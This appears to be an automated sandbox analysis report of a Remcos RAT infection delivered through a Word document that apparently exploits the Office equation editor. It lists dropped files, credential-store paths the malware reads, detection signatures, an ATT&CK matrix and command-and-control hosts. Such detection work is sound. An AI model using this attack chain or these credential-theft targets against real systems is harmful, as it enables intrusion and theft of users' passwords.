                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeCode function: GetLocaleInfoW,25_2_00452313
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeCode function: EnumSystemLocalesW,25_2_00448404
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,25_2_0045243C
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeCode function: GetLocaleInfoW,25_2_00452543
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,25_2_00452610
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeCode function: GetLocaleInfoA,25_2_0040F8D1
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeCode function: GetLocaleInfoW,25_2_004488ED
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeCode function: IsValidCodePage,GetLocaleInfoW,25_2_00451CD8
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeCode function: EnumSystemLocalesW,25_2_00451F50
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeCode function: EnumSystemLocalesW,25_2_00451F9B
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrQueries volume information: C:\Users\user\AppData\Roaming\plugman23456.scr VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeQueries volume information: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrQueries volume information: C:\ VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrQueries volume information: C:\ VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 12_2_10002264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,12_2_10002264
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 22_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,22_2_004082CD
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeCode function: 25_2_00449190 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,25_2_00449190
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 21_2_0041739B GetVersionExW,21_2_0041739B
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Yara detected Remcos RAT
                  Source: Yara matchFile source: 25.2.znlzneAxBVd.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.plugman23456.scr.34f9570.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 25.2.znlzneAxBVd.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.plugman23456.scr.3572190.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.plugman23456.scr.3572190.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.plugman23456.scr.34f9570.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000C.00000002.885917708.00000000006F4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000019.00000002.396020237.0000000000914000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.886068183.0000000000E9F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.885963497.0000000000748000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000019.00000002.395655089.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.378816554.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: plugman23456.scr PID: 3396, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: plugman23456.scr PID: 3704, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: znlzneAxBVd.exe PID: 3252, type: MEMORYSTR
                  Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                  Contains functionality to steal Chrome passwords or cookies
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data25_2_0040BA12
                  Contains functionality to steal Firefox passwords or cookies
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\25_2_0040BB30
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeCode function: \key3.db25_2_0040BB30
                  Searches for Windows Mail specific files
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail <.oeaccount
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULL
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail *
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULL
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup *
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup NULL
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new *
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new NULL
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\places.sqlite
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db
                  Tries to steal Instant Messenger accounts or passwords
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrKey opened: HKEY_CURRENT_USER\Software\Paltalk
                  Tries to steal Mail credentials (via file / registry access)
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrKey opened: HKEY_CURRENT_USER\Identities\{56EE7341-F593-4666-B32B-0DA2F15C6755}\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4add
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
                  Tries to steal Mail credentials (via file registry)
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: ESMTPPassword22_2_004033F0
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword22_2_00402DB3
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword22_2_00402DB3
                  Yara detected WebBrowserPassView password recovery tool
                  Source: Yara matchFile source: Process Memory Space: plugman23456.scr PID: 4068, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Detected Remcos RAT
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrMutex created: \Sessions\1\BaseNamedObjects\Rmc-BW3KDFJump to behavior
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-BW3KDF
                  Yara detected Remcos RAT
                  Source: Yara matchFile source: 25.2.znlzneAxBVd.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.plugman23456.scr.34f9570.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 25.2.znlzneAxBVd.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.plugman23456.scr.3572190.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.plugman23456.scr.3572190.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.plugman23456.scr.34f9570.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000C.00000002.885917708.00000000006F4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000019.00000002.396020237.0000000000914000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.886068183.0000000000E9F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.885963497.0000000000748000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000019.00000002.395655089.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.378816554.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: plugman23456.scr PID: 3396, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: plugman23456.scr PID: 3704, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: znlzneAxBVd.exe PID: 3252, type: MEMORYSTR
                  Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeCode function: cmd.exe25_2_0040569A

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity Information1
                  Scripting                  		Valid Accounts11
                  Native API                  		1
                  Scripting                  		1
                  DLL Side-Loading                  		11
                  Disable or Modify Tools                  		2
                  OS Credential Dumping                  		2
                  System Time Discovery                  		Remote Services11
                  Archive Collected Data                  		23
                  Ingress Tool Transfer                  		Exfiltration Over Other Network Medium1
                  System Shutdown/Reboot
                  CredentialsDomainsDefault Accounts33
                  Exploitation for Client Execution                  		1
                  DLL Side-Loading                  		1
                  Bypass User Account Control                  		1
                  Deobfuscate/Decode Files or Information                  		211
                  Input Capture                  		1
                  Account Discovery                  		Remote Desktop Protocol1
                  Data from Local System                  		2
                  Encrypted Channel                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts13
                  Command and Scripting Interpreter                  		1
                  Windows Service                  		1
                  Access Token Manipulation                  		41
                  Obfuscated Files or Information                  		2
                  Credentials in Registry                  		1
                  System Service Discovery                  		SMB/Windows Admin Shares2
                  Email Collection                  		1
                  Non-Standard Port                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal Accounts1
                  Scheduled Task/Job                  		1
                  Scheduled Task/Job                  		1
                  Windows Service                  		1
                  Install Root Certificate                  		3
                  Credentials In Files                  		4
                  File and Directory Discovery                  		Distributed Component Object Model211
                  Input Capture                  		1
                  Remote Access Software                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud Accounts2
                  Service Execution                  		Network Logon Script222
                  Process Injection                  		12
                  Software Packing                  		LSA Secrets38
                  System Information Discovery                  		SSH3
                  Clipboard Data                  		2
                  Non-Application Layer Protocol                  		Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
                  Scheduled Task/Job                  		1
                  DLL Side-Loading                  		Cached Domain Credentials3
                  Security Software Discovery                  		VNCGUI Input Capture122
                  Application Layer Protocol                  		Data Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                  Bypass User Account Control                  		DCSync31
                  Virtualization/Sandbox Evasion                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
                  Masquerading                  		Proc Filesystem4
                  Process Discovery                  		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt31
                  Virtualization/Sandbox Evasion                  		/etc/passwd and /etc/shadow1
                  Application Window Discovery                  		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                  Access Token Manipulation                  		Network Sniffing1
                  System Owner/User Discovery                  		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                  Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd222
                  Process Injection                  		Input Capture1
                  Remote System Discovery                  		Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 signatures2 2 Behavior Graph ID: 1465260 Sample: Offer ZI-0428.doc Startdate: 01/07/2024 Architecture: WINDOWS Score: 100 68 Found malware configuration 2->68 70 Malicious sample detected (through community Yara rule) 2->70 72 Antivirus detection for URL or domain 2->72 74 18 other signatures 2->74 9 WINWORD.EXE 291 18 2->9         started        11 taskeng.exe 1 2->11         started        process3 process4 13 EQNEDT32.EXE 11 9->13         started        18 EQNEDT32.EXE 9->18         started        20 znlzneAxBVd.exe 11->20         started        dnsIp5 66 sinopecllc.top 31.192.235.145, 49164, 80 GLESYS-ASSE Russian Federation 13->66 58 C:\Users\user\AppData\...\plugman23456.scr, PE32 13->58 dropped 60 C:\Users\user\AppData\Local\...\plug[1].scr, PE32 13->60 dropped 102 Office equation editor establishes network connection 13->102 104 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 13->104 22 plugman23456.scr 5 13->22         started        106 Antivirus detection for dropped file 20->106 108 Contains functionality to bypass UAC (CMSTPLUA) 20->108 110 Machine Learning detection for dropped file 20->110 112 6 other signatures 20->112 26 znlzneAxBVd.exe 20->26         started        28 powershell.exe 20->28         started        30 powershell.exe 20->30         started        32 schtasks.exe 20->32         started        file6 signatures7 process8 file9 54 C:\Users\user\AppData\...\znlzneAxBVd.exe, PE32 22->54 dropped 56 C:\Users\user\AppData\Local\...\tmpF0B6.tmp, XML 22->56 dropped 84 Antivirus detection for dropped file 22->84 86 Tries to steal Mail credentials (via file registry) 22->86 88 Machine Learning detection for dropped file 22->88 92 3 other signatures 22->92 34 plugman23456.scr 3 13 22->34         started        39 powershell.exe 4 22->39         started        41 powershell.exe 4 22->41         started        43 schtasks.exe 22->43         started        90 Detected Remcos RAT 26->90 signatures10 process11 dnsIp12 62 antfly50.sytes.net 80.85.154.121, 1980, 49165, 49166 CHELYABINSK-SIGNAL-ASRU Russian Federation 34->62 64 geoplugin.net 178.237.33.50, 49167, 80 ATOM86-ASATOM86NL Netherlands 34->64 52 C:\ProgramData\remcos\logs.dat, data 34->52 dropped 76 Detected Remcos RAT 34->76 78 Maps a DLL or memory area into another process 34->78 80 Installs a global keyboard hook 34->80 45 plugman23456.scr 34->45         started        48 plugman23456.scr 34->48         started        50 plugman23456.scr 34->50         started        82 Installs new ROOT certificates 39->82 file13 signatures14 process15 signatures16 94 Tries to steal Instant Messenger accounts or passwords 45->94 96 Tries to steal Mail credentials (via file / registry access) 45->96 98 Searches for Windows Mail specific files 45->98 100 Tries to harvest 